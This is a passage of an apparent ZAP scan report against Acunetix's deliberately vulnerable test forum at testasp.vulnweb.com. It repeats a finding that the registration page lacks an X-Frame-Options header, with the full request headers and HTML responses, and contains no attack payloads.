Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
